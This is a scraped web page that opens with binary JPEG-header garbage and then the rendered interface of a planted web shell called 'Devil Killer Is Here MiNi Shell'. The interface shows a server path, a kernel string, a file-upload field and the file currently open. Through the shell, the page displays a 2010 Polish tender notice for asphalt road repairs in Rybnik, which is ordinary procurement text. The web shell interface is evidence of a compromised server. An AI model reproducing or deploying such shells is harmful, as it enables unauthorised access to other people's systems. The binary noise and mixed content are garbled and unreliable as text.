JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100125/21058-N-2010.html

<p class="kh_header"><b>Rybnik: Naprawa uszkodzeń pozimowych i wynikłych z bieżącej eksploatacji w nawierzchniach bitumicznych dróg wojewódzkich i powiatowych metodą remontów cząstkowych z wycinaniem i miejscowych remontów mieszankami mineralno - asfaltowymi z użyciem frezarki z podziałem na zadania.</b><br>
<b>Numer ogłoszenia: 21058 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Jankowicka 49, 44-200 Rybnik, woj. śląskie, tel. 032 4227478, 4227874, faks 032 4227479.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.powiatrybnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa uszkodzeń pozimowych i wynikłych z bieżącej eksploatacji w nawierzchniach bitumicznych dróg wojewódzkich i powiatowych metodą remontów cząstkowych z wycinaniem i miejscowych remontów mieszankami mineralno - asfaltowymi z użyciem frezarki z podziałem na zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest wykonanie remontu cząstkowego nawierzchni bitumicznych niżej wymienionych dróg  wojewódzkich i powiatowych  mieszankami mineralno - asfaltowymi ( jak dla ruchu KR3-KR6) na gorąco (beton asfaltowy) wytwarzanymi w wytwórniach mas bitumicznych , mieszankami mineralno - asfaltowymi wytworzonymi w recyklerach , mieszanką mineralno - asfaltową na zimno oraz mieszankami mineralno - asfaltowymi ( jak dla ruchu KR3-KR6) na gorąco (beton asfaltowy jak dla ruchu KR3-KR6) przy użyciu frezarki .

Remont cząstkowy mieszanką mineralno - asfaltową na gorąco i wytworzoną w recyklerze obejmuje m.in. :

-	wycięcie uszkodzonych miejsc nawierzchni z nadaniem regularnych kształtów 
-	oczyszczenie uszkodzonych miejsc z usunięciem i odwozem ewentualnego gruzu
-	ogrzanie bitumu i skropienie naprawianego miejsca ( lub z zastosowaniem emulsji na zimno)
-	rozścielenie mieszanki mineralno - asfaltowej w jednej lub dwóch warstwach w zależności od głębokości uszkodzenia
-	zagęszczenie poszczególnych warstw ułożonej mieszanki
-	posmarowanie bitumem powierzchni górnej warstwy na złączach ze starą nawierzchnią
-	transport mieszanki z wytwórni do miejsca wbudowania lub wytworzenie mieszanki w recyklerze ( dla zakresu 
       remont mieszanką z recyklera)
-	odwóz  gruzu asfaltowego wraz  z jego utylizacją i opłatą środowiskową


Remont cząstkowy masą mineralno - asfaltową na zimno obejmuje . :

-	oczyszczenie uszkodzonych miejsc z usunięciem i odwozem ewentualnego gruzu
-	ogrzanie bitumu i skropienie naprawianego miejsca ( lub z zastosowaniem emulsji na zimno)
-	rozścielenie mieszanki mineralno - asfaltowej do stosowania na zimno
-	zagęszczenie poszczególnych warstw ułożonej mieszanki
-	transport mieszanki  do miejsca wbudowania 


Remont uszkodzeń nawierzchni bitumicznych  betonem asfaltowym  z użyciem frezarki polega na :

-	wyfrezowaniu wskazanych uszkodzonych miejsc na wymaganą głębokość frezarką sterowaną elektronicznie, umożliwiającą frezowanie na określoną głębokość,
-	ogrzaniu bitumu i skropieniu naprawianego miejsca ( lub z zastosowaniem emulsji na zimno)
-	rozścieleniu mieszanki mineralno - asfaltowej w jednej lub dwóch warstwach w zależności od głębokości uszkodzenia,
-	zagęszczeniu poszczególnych warstw ułożonej mieszanki,
-	posmarowaniu bitumem powierzchni górnej warstwy na złączach ze starą nawierzchnią,
-	transporcie mieszanki z wytwórni do miejsca wbudowania,
-	transporcie destruktu z frezowania nawierzchni na plac składowy do siedziby Obwodu Drogowego w Bełku  lub inne miejsce wskazane przez Zamawiającego.


Zamówienie obejmuje roboty polegające na likwidacji wybojów , ubytków i innych uszkodzeń pozimowych oraz wynikłych                        z bieżącej eksploatacji w nawierzchniach bitumicznych  (wymienionych w informacjach dotyczących opisu ofert częściowych) dróg wojewódzkich i powiatowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy spełniają warunki , dotyczące :
1). Posiadania uprawnień do wykonywania określonej działalności lub czynności , jeżeli  przepisy prawa   
     nakładają obowiązek ich posiadania ;
2). Posiadania wiedzy i doświadczenia;
3). Dysponowania odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania zamówienia; ;
4). Sytuacji ekonomicznej i finansowej.
oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1i ust. 2 ustawy Prawo zamówień publicznych.
Opis sposobu dokonywania oceny spełniania tych warunków :
Opis warunków i udziału w postępowaniu, określone w oparciu o art. 22 ust. 1 pkt 1-4 ustawy Pzp.
 

1. Potencjał kadrowy
- Wykonawca musi mieć do dyspozycji conajmniej 1 osobę do pełnienia funkcji kierownika robót odpowiedzialną za kierowanie  robotami  budowlanymi , posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej oraz  osoby do kierowania ruchem drogowym , minimalna ilość osób dla każdego zadania :2

2 Doświadczenie
- Wykonawca musi wykazać , że w okresie ostatnich 5 lat przed upływem terminu składania ofert  w   postępowaniu, a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie  wykonał  co najmniej :  1  zamówienie  w zakresie realizacji zamówień  podobnych  do przedmiotu zamówienia . Za zamówienia o podobnym charakterze  uważa się roboty budowlane  - remonty związane z układaniem nawierzchni   bitumicznych - o wartości co najmniej : dla zadania nr 1 - 220 000,00 złotych każde  zamówienie, dla zadania nr 2 - 300 000,00 złotych każde zamówienie , dla zadania nr 3 - 320 000,00 złotych każde zamówienie , dla zadania nr 4 - 160 000,00 złotych każde zamówienie , dla zadania nr 5 - 150 000,00 złotych każde zamówienie , dla zadania nr 6 - 155 000,00 złotych każde.
Uwaga : w przypadku składania oferty na więcej niż jedną część spełnieniem warunku będzie  wykazanie przez wykonawcę  tylu realizacji zadań , na ile części składa ofertę,  o minimalnych wartościach wskazanych powyżej lub wykazanie jednego zadania o wartości obejmującej łącznie właściwe części.
Uznanie wykonanych robót uwarunkowane jest przedstawieniem  dokumentów  potwierdzających że roboty 
 te zostały wykonane należycie. 

3 Potencjał  techniczny 
Wykonawca musi dysponować narzędziami i urządzeniami oraz środkami transportu, w ilości niezbędnej do jednoczesnego realizowania wszystkich powierzonych zadań :
- Wykonawca dysponuje co  najmniej : 2 piłami spalinowymi,  1 samochodem ciężarowym -  środkiem do transportu mieszanki , 1 walcem samojezdnym , 1 recyklerem  do przetwarzania destruktu dla zadań 1,2,  ;  1 samochodem ciężarowym -  środkiem do transportu mieszanki , 1 walcem samojezdnym i  frezarką do nawierzchni drogowych  o szerokości bębna do 120 cm dla zadań 3i 4;
2 piłami spalinowymi,  1 samochodem ciężarowym -  środkiem do transportu mieszanki , 1 walcem samojezdnym dla zadań 5 i 6.
Uwaga : w przypadku składania oferty  na więcej niż jedną część wykonawca musi wykazać się posiadaniem sprzętu  
w ilości odpowiadającej ilości części , na które składa ofertę ( z wyłączeniem frezarki ) .

         Wykonawca może polegać na wiedzy i doświadczeniu , potencjale technicznym , osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów  , niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , że będzie dysponował  zasobami niezbędnymi do realizacji zamówienia , przedstawiając  w tym celu pisemne zobowiązanie  tych podmiotów do oddania  mu do dyspozycji  niezbędnych zasobów  na okres korzystania  z nich przy wykonywaniu zamówienia.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana w oparciu o art. 22 ustawy Pzp i polegać będzie na ocenie złożonych dokumentów i oświadczeń potwierdzających spełnienie tych warunków ( analiza spełnia / nie spełnia warunku postępowania) oraz na stwierdzeniu braku podstaw do wykluczenia Wykonawcy na podstawie  art. 24 ust. 1-2 ustawy Pzp. Podstawą oceny spełniania warunków będą w szczególności wymagane dokumenty i oświadczenia,o których mowa w punkcie 14 siwz na zasadzie spełnia/ nie spełnia wymaganego warunku.

 Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia ( spółki cywilne / konsorcja) :

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia , żaden z nich nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 i ust. 2 pkt 1-4 ustawy Pzp, natomiast warunki określone w punkcie 14.1siwz muszą spełniać łącznie.

 Ocena spełniania warunków udziału w postępowaniu będzie dokonana w oparciu o art. 22 Pzp i polegać będzie na ocenie złożonych dokumentów i oświadczeń potwierdzających spełnienie  tych warunków ( analiza spełnia / nie spełnia warunku postępowania) oraz na stwierdzeniu  braku podstaw do wykluczenia Wykonawcy na podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp. Podstawą oceny spełniania warunków będą w szczególności wymagane dokumenty i oświadczenia o których mowa w punkcie 15 siwz na zasadzie spełnia / nie spełnia wymaganego warunku..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Dla potwierdzenia spełnienia warunków , określonych w art. 24 ust. 1 pkt 1-9 ustawy Pzp, Wykonawcy 
    powinni  przedłożyć niżej wymienione dokumenty :

1) Oświadczenie o braku podstaw do wykluczenia Wykonawcy z powodu niespełnienia warunków , o których mowa w 
     art. 24 ust. 1 ustawy ( na formularzu stanowiącym załącznik nr 2  do  siwz) ;

2)  Aktualny odpis z właściwego rejestru , jeżeli odrębne przepisy wymagają wpisu do rejestru , w celu wykazania braku 
     podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy , wystawionego nie wcześniej niż 6 miesięcy przed 
     upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 
     ustawy;
       
2	Dla potwierdzenia spełnienia warunków , określonych w punkcie 14.1 siwz Wykonawcy powinni 
       przedłożyć  następujące dokumenty:

1) Oświadczenie o spełnianiu warunków , o których mowa w artykule 22 ust. 1 ustawy ( formularz stanowi załącznik nr 
    3 do  siwz)

2)Wykaz osób , które będą uczestniczyć w wykonywaniu zamówienia , odpowiedzialnych za świadczenie usług, 
    kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat  ich kwalifikacji zawodowych
    doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nie 
    czynności oraz informacją o podstawie dysponowania tymi osobami ( na formularzu stanowiącym załącznik  nr 4 do 
     siwz); W przypadku, gdy wykonawca wskaże w wykazie  osoby, którymi nie dysponuje , lecz będzie dysponował , 
    musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób.

3) Oświadczenie , że wskazana przez wykonawcę osoba do pełnienia funkcji kierownika robót posiada uprawnienia 
    budowlane do kierowania robotami budowlanymi w specjalności drogowej , a osoby wskazane do kierowania ruchem 
    w czasie trwania prac posiadają uprawnienia w zakresie kierowania ruchem na drodze. 
    W przypadku, gdy wykonawca wskaże w wykazie  osoby, którymi nie dysponuje , lecz będzie dysponował , 
    musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób.

4) Wykaz robót budowlanych w zakresie niezbędnym do wykazania  spełniania warunku wiedzy i doświadczenia
   (o  którym mowa w punkcie III.2  niniejszego ogłoszenia (2. Doświadczenie) wykonanych w okresie ostatnich pięciu 
   lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie , z 
    podaniem ich rodzaju wartości , daty i miejsca wykonania  oraz załączeniem dokumentu potwierdzającego , że roboty 
   zostały wykonane zgodnie z  zasadami  sztuki budowlanej i prawidłowo ukończone ( referencje zawierające 
   wymagane dane , protokoły odbioru  robót itp.) ( (wzór formularza  stanowi załącznik nr 5 do niniejszej siwz). 
    Powyższa Informacja musi potwierdzać spełnienie warunku  , o którym mowa w punkcie 14.1.2  siwz.

 5).Informacje o dysponowaniu sprzętem ( zgodnie ze wzorem  formularza , stanowiącego załącznik nr  6 do  siwz)  
     potwierdzające spełnienie warunku zgodne z punktem III.2 niniejszego ogłoszenia (3.Potencjał techniczny oraz 14.1.3
    siwz wraz z informacją o podstawie dysponowania tymi zasobami.
    W przypadku, gdy wykonawca wskaże w wykazie  sprzęt, którym nie dysponuje , lecz będzie dysponował , 
    musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tego sprzętu.

 Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają 
 odpowiednie dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy p.z.p. w sprawie 
  dokumentów , jakich może żądać zamawiający od  wykonawcy oraz form , w jakich te dokumenty mogą być składane 
  ( Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. Dz.U. Nr 226 , poz. 1817).

 Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o 
  których mowa w § 1 ust. 2 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów 
  dokumentów , jakich może zażądać zamawiający od wykonawcy , oraz form , w jakich te dokumenty mogą być 
  składane , kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za 
  zgodność z oryginałem przez wykonawcę lub te podmioty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.powiatrybnicki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:  Zarząd Dróg Powiatowych, 44-200 Rybnik , ul. Jankowicka 49 , pok. 16..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2010 godzina 08:30, miejsce: siedziba Zarządu Dróg Powiatowych , 44-200 Rybnik , ul. Jankowicka 49 , pok. 14..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> remont cząstkowy  nawierzchni bitumicznych  dróg wojewódzkich nr 425 , 919, 920, 921mieszanką mineralno -  asfaltową  na gorąco ( beton asfaltowy -                  dla ruchu KR 3 -KR 6) wytworzoną w wytwórni mas bitumicznych , mieszanką mineralno - asfaltową                 wytworzoną  w recyklerach oraz masą mineralno asfaltową na zimno do stosowania w warunkach zimowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 1- obejmuje roboty polegające na wykonaniu remontu cząstkowego  nawierzchni bitumicznych niżej wymienionych dróg wojewódzkich mieszanką mineralno -  asfaltową  na gorąco ( jak dla ruchu KR 3-KR 6) wytworzoną w wytwórni mas bitumicznych , wytworzoną w recyklerze oraz masą na zimno do stosowania w warunkach zimowych :

 425 odc. od granicy woj. Opolskiego - skrzyż. z DW 919 , 
 919 odc. od skrzyż. z DW 920 w Rudach do skrzyż z DW 408 w Sośnicowicach
 920 odc. od skrzyż. z DW 919 w Rudach do gr. z m. Rybnik
 921 odc. od DW 919 w Przeryciu do skrzyż. z DW 924 w Kuźni Nieborowskiej
Zakres rzeczowy  zadania nr 1 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych  z  bieżącej eksploatacji . Szacuje się wbudowanie ok. 300 ton  mieszanki mineralno asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych  , ok. 30 ton mieszanki mineralno - asfaltowej wytworzonej w recyklerach oraz uzupełnienie niebezpiecznych ubytków mieszanką mineralno asfaltową na zimno do stosowania w warunkach zimowych w ilości ok. 10 ton..
Właściwy zakres rzeczowy robót  będzie ustalany na bieżąco w zależności od potrzeb jakie ujawnią się po ustaniu warunków zimowych oraz w trakcie eksploatacji dróg w okresie od dnia podpisania umowy do 30 grudnia 2010 roku, w oparciu  o przeprowadzoną przez Zamawiającego inwentaryzację dróg pod kątem wystąpienia wybojów i uszkodzeń . Powyższa ilość ma charakter szacunkowy  i została podana  w celu realnej oceny ofert i wyboru najkorzystniejszej oferty według obiektywnych wskaźników..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> remont cząstkowy  nawierzchni bitumicznych  dróg wojewódzkich nr 923, 924, 925, 929, 932, 935 mieszanką mineralno -  asfaltową  na gorąco ( beton asfaltowy -  dla ruchu KR 3 -KR 6) wytworzoną w wytwórni mas bitumicznych , mieszanką mineralno - asfaltową wytworzoną  w recyklerach oraz masą mineralno asfaltową na zimno do stosowania w warunkach zimowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr  2- obejmuje roboty polegające na wykonaniu remontu cząstkowego  nawierzchni bitumicznych niżej wymienionych dróg wojewódzkich mieszanką mineralno -  asfaltową  na gorąco ( jak dla ruchu KR 3-KR 6) wytworzoną                w wytwórni mas bitumicznych , wytworzoną w recyklerze oraz masą na zimno do stosowania w warunkach zimowych :

 923 odc. od DW 919 Markowice - do skrzyż. z DW 935 w Rzuchowie   

 924  odc. od DW 921 w Knurowie - do gr. m. Żory       

 925  odc. od DW 926 w Orzeszu - gr. m. Rybnik                 
            
 929  odc. od gr. m. Rybnik - do skrzyż. z DW 932 w Świerklanach      

 932  odc. od DW 930 w Świerklanach - do gr. m. Żory                
     
 935 odc. od DW 933 w Rzuchowie - do gr. m. Rybnik        

Zakres rzeczowy  zadania nr 2 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych  z  bieżącej eksploatacji . Szacuje się wbudowanie ok. 420 ton  mieszanki mineralno asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych  , ok. 40 ton mieszanki mineralno - asfaltowej wytworzonej w recyklerach oraz uzupełnienie niebezpiecznych ubytków mieszanką mineralno asfaltową na zimno do stosowania w warunkach zimowych w ilości ok. 10 ton.
Właściwy zakres rzeczowy robót  będzie ustalany na bieżąco w zależności od potrzeb jakie ujawnią się po ustaniu warunków zimowych oraz w trakcie eksploatacji dróg w okresie od dnia podpisania umowy do 30 grudnia 2010 roku, w oparciu     o przeprowadzoną przez Zamawiającego inwentaryzację dróg pod kątem wystąpienia wybojów i uszkodzeń . Powyższa ilość ma charakter szacunkowy  i została podana  w celu realnej oceny ofert i wyboru najkorzystniejszej oferty według obiektywnych wskaźników..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> miejscowy remont nawierzchni bitumicznych dróg wojewódzkich nr 425 , 919, 920, 921mieszanką mineralno -  asfaltową  na gorąco ( beton asfaltowy - dla ruchu KR 3 -KR 6) wytworzoną w wytwórni mas bitumicznych z użyciem frezarki..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 3- obejmuje roboty polegające na wykonaniu remontu   nawierzchni bitumicznych niżej wymienionych dróg wojewódzkich mieszanką mineralno -  asfaltową  na gorąco ( jak dla ruchu KR 3-KR 6) wytworzoną w wytwórni mas bitumicznych z użyciem frezarek do nawierzchni drogowych na odcinkach o największych skupiskach uszkodzeń :

 425 odc. od granicy woj. Opolskiego - skrzyż. z DW 919 , 
 919 odc. od skrzyż. z DW 920 w Rudach do skrzyż z DW 408 w Sośnicowicach
 920 odc. od skrzyż. z DW 919 w Rudach do gr. z m. Rybnik
 921 odc. od DW 919 w Przeryciu do skrzyż. z DW 924 w Kuźni Nieborowskiej
Zakres rzeczowy  zadania nr 3 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych  z  bieżącej eksploatacji . Szacuje się wykonanie łat  na powierzchniach uszkodzonych w  ilości nie przekraczającej łącznie 4500 m2 .
Powyższa ilość ma charakter szacunkowy  i została podana  w celu realnej oceny ofert i wyboru najkorzystniejszej oferty według obiektywnych wskaźników..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> miejscowy   remont   nawierzchni bitumicznych  dróg wojewódzkich nr 923,924,925,929,932,935 mieszanką mineralno -  asfaltową  na gorąco ( beton asfaltowy -  dla ruchu KR 3 -KR 6) wytworzoną w wytwórni mas bitumicznych bitumicznych  z użyciem frezarki..</p>
